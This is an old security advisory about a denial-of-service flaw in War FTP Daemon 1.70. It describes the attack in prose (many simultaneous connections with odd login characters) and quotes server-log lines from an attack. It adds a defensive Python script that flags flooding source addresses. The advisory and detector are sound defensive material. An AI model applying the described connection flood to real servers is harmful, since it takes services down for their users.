COMMAND
War FTPd
SYSTEMS AFFECTED
War FTP Daemon 1.70
PROBLEM
UssrLabs found a Local/Remote DoS attack in War FTP Daemon 1.70.
The buffer overflow is caused by multiple connections at the
same time (over 60) to the FTP server, and some characters in
the login name. There is not much to expand on.... just a simple
hole. For the source / binary of this remote / local D.O.S. go to:
http://www.ussrback.com/
The exploit was tested against various computers just to try it,
and you can't use the exploit on the local machine; the exploit
always works if we use it in remote mode. Below is the MIME-encoded
source of the exploit:
SOLUTION
War FTP Daemon 1.70 is beta software, and will be replaced with a
new major version early next year. The development on the 1.70
source tree has stopped, and no new versions of 1.7* are planned,
unless some serious security problems are reported. The Remote
D.o.S. attack does stall the server. There is however no
indication of any buffer-overflow problems or other
security-related problems. The attack is logged to the server log
if the default log options are enabled. An attack of this type
may look like this in the server log:
I 12/17/99 02:19:43 FTPD:test21:0001 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4496->193.91.161.20:21) is connected to the FTP server.
I 12/17/99 02:19:43 FTPD:test21:0002 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4497->193.91.161.20:21) is connected to the FTP server.
I 12/17/99 02:19:43 FTPD:test21:0003 (User=18446744073709551615 ) [WarFTPD::OnAccept()] Client (193.91.161.151:4498->193.91.161.20:21) is connected to the FTP server.
...
A large number of connections from a single IP address at the
same time indicates an attack. If logging of debug messages is
enabled, the log will also show something like this:
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command ".=1Fbl=17sJw=17{aP=10.q"
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command "}=19DGqD=1F=06YH"
D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) [WarFTPDControlSck::OnCommand()] Got command "05(=17N^ m=11P=D3=92=B9=16=E0=CC=E1=01=F82Qc|"
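The log signature described above (many OnAccept entries from one source
address within seconds) can be checked automatically. The following is an
added example, not code from War FTP Daemon or from UssrLabs: it parses
server-log lines in the format quoted above and reports any source IP that
exceeds a threshold of accepts inside a sliding time window. The threshold,
window and the extra sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the WarFTPD 1.70 "OnAccept" server-log lines quoted in the advisory.
ACCEPT_RE = re.compile(
    r'^I (?P<date>\d{2}/\d{2}/\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) '
    r'FTPD:\S+ \(User=\S+ ?\) \[WarFTPD::OnAccept\(\)\] '
    r'Client \((?P<src>\d{1,3}(?:\.\d{1,3}){3}):\d+->[\d.]+:\d+\) is connected'
)

def parse_accepts(lines):
    """Yield (timestamp, source_ip) for each OnAccept line; other lines are skipped."""
    for line in lines:
        m = ACCEPT_RE.match(line)
        if m:
            ts = datetime.strptime(m['date'] + ' ' + m['time'], '%m/%d/%y %H:%M:%S')
            yield ts, m['src']

def find_flooders(lines, threshold=10, window_seconds=5):
    """Return {ip: peak count} for sources with at least `threshold` accepts
    inside any `window_seconds` window. Lines are assumed to be in log order."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    peaks = {}
    for ts, ip in parse_accepts(lines):
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # drop accepts that fell out of the window
        if len(q) >= threshold and len(q) > peaks.get(ip, 0):
            peaks[ip] = len(q)
    return peaks

# Constructed sample log: the advisory's accept lines extended to 12 accepts from
# one host within 3 seconds, one normal client, and one debug line to be ignored.
_FMT = ('I 12/17/99 02:19:{sec:02d} FTPD:test21:{seq:04x} (User=18446744073709551615 ) '
        '[WarFTPD::OnAccept()] Client ({src}:{port}->193.91.161.20:21) '
        'is connected to the FTP server.')
SAMPLE_LOG = [_FMT.format(sec=43 + i // 4, seq=i + 1, src='193.91.161.151', port=4496 + i)
              for i in range(12)]
SAMPLE_LOG.insert(5, _FMT.format(sec=44, seq=100, src='10.0.0.7', port=33001))
SAMPLE_LOG.append('D 12/17/99 02:19:48 FTPD:test21:000e (User=18446744073709551615 ) '
                  '[WarFTPDControlSck::OnCommand()] Got command "USER test"')

if __name__ == '__main__':
    for ip, n in find_flooders(SAMPLE_LOG).items():
        print(f'{ip}: {n} connections within 5 s -> possible flood')
```

Feed the real server log to find_flooders() line by line; only OnAccept lines contribute to the count, so debug and command entries do not inflate it.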
War FTP Daemon 3.0 will have three levels of protection for this
and similar attacks:
- 1) Dynamic interaction with firewall software to lock out
flooders
- 2) Fast accept(); close(); cycles when connections are made
too fast
- 3) Traffic analysis and temporary lock-outs for hosts that
make too many connection attempts (hammering protection).